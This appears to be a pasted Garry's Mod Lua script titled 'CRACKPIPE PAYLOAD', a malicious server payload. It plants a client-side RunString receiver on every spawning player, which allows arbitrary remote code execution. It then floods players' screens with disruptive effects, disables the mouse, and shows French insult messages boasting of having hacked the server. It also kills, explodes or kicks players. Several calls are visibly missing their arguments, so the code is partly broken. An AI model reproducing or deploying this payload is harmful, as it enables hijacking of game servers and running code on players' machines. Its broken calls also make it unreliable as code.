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Jul 21st, 2019
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  1. local CP = {} = "CP_CLSV__" util.AddNetworkString( CP.code = string.Replace([==[ local gfx = {} local messages = { "Redémarrer ton serveur ne sert à rien !", "Vous déconnecter ne sert à rien !", "slt c moi starrock", " j ai peut etre hack ton serveur", "en verite oui mais il a du leaks", "serveur de merde qui pu ", "niquage de serveur", "DEDI A TOI POUR SE SERVEUR DE MERDE", } hook.Add("HUDPaint", "FUCKIT_G",function() for k,v in pairs(gfx) do v() end end) local message = "Ne redemmare pas ton server, cela ne sert a rien" local function SlowType(msg,interval,callback) callback = callback or function()end message = "" for i=1,#msg do timer.Simple(interval * i,function() message = message .. msg[i] end) end timer.Simple(#msg*interval,callback) end local function GetRandomSpot() local ppos = LocalPlayer():GetPos() return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10)) end surface.CreateFont("PWN",{bold=true,size=40}) SOUNDSTART_CTP = false sound.PlayURL("","no block",function(s) if not s then return end if SOUNDSTART_CTP then s:Stop() return end SOUNDSTART_CTP = true local ragtbl = {} for i=1,20 do ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" ) ragtbl[i]:SetNoDraw( false ) ragtbl[i]:DrawShadow( true ) end timer.Create("ChangeRagdolesSpotsAW", 1, 0, function() for k,v in pairs(ragtbl) do v:SetPos(GetRandomSpot()) end end) hook.Add("AdjustMouseSensitivity","MDR",function() return 0 end) gfx["CoolEffect"] = function() local tbl = {} s:FFT(tbl,FFT_2048) local fal = 0 for i=4,6 do fal = fal + tbl[i] end if fal > 0.8 then local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150) gfx["ColorChange"] = function() draw.RoundedBoxEx(0, 0, 0, ScrW(),ScrH(),ca) end util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20) local mats = Entity(0):GetMaterials() for k,v in pairs(mats) do local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50 Material(v):SetVector("$color", Vector(r,g,b)) Material(v):SetTexture( "$basetexture", "_rt_fullframefb" ) end end for k,v in pairs(tbl) do local col = HSVToColor(k * 1 % 360,1,1) draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col) draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col) end end timer.Simple(29, function() hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d) return a,b,c+140,d end) RunConsoleCommand("sv_friction", "-4") end) local cc = 1 local omgs = {} timer.Create("MVSPOS", 0.04, 0, function() for k,v in pairs(omgs) do if omgs[ k ].n <= 0 then omgs[ k ] = nil continue end omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1} end end) local isPounding = false timer.Create("NEXTMSG", 6, #messages, function() if cc > #messages then isPounding = true return end table.insert(omgs, {text = messages[ cc ],n = ScrH()}) cc = cc + 1 end) gfx["MessageC"] = function() if isPounding and (#messages <= 0) then draw.SimpleText("RT ton server <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1) end for k,v in pairs(omgs) do draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1) end end end) ]==], "{netk}", CP.NetFunction = {} CP.NetFunction["k"] = function(ply) ply:Kill() end CP.NetFunction["e"] = function(ply) ply:Kill() local explosion = ents.Create( "env_explosion" ) explosion:SetKeyValue( "spawnflags", 144 ) explosion:SetKeyValue( "iMagnitude", 15 ) explosion:SetKeyValue( "iRadiusOverride", 256 ) explosion:SetPos(ply:GetPos()) explosion:Spawn( ) explosion:Fire("explode","",0) end CP.NetFunction["a"] = function(ply) ply:Kick("CRACKPIPE PAYLOAD v.27") end net.Receive("CP_CLSV__",function(_,ply) CP.NetFunction[net.ReadString()](ply) end) function CP.SetupPlayer(ply) ply:SendLua([[net.Receive("]][[",function() RunString(net.ReadString()) end)]]) end function CP.SendPlayer(ply) net.Start( net.WriteString(CP.code) net.Send(ply) end function CP.Spawn(ply) print(ply:Name().." connected, sending payload. . .") CP.SetupPlayer(ply) timer.Simple(5, function() CP.SendPlayer(ply) end) end hook.Add( "PlayerSpawn", "CP_Spawn", CP.Spawn ) for i,v in ipairs(player.GetAll()) do CP.Spawn(v) end print("party2.1")
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